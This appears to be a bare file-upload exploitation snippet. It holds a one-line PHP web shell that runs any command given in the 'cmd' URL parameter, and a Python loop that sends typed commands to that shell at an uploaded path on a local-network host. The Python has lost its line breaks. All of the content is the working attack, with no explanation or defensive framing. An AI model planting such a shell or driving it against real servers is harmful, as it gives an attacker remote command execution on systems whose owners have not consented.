<?php echo system($_GET['cmd']);?>
import requests while(1): command = str(input()) url = 'http://192.168.64.2/file/upload/cmd.php?cmd=' response = requests.get(url+command) print(response.text)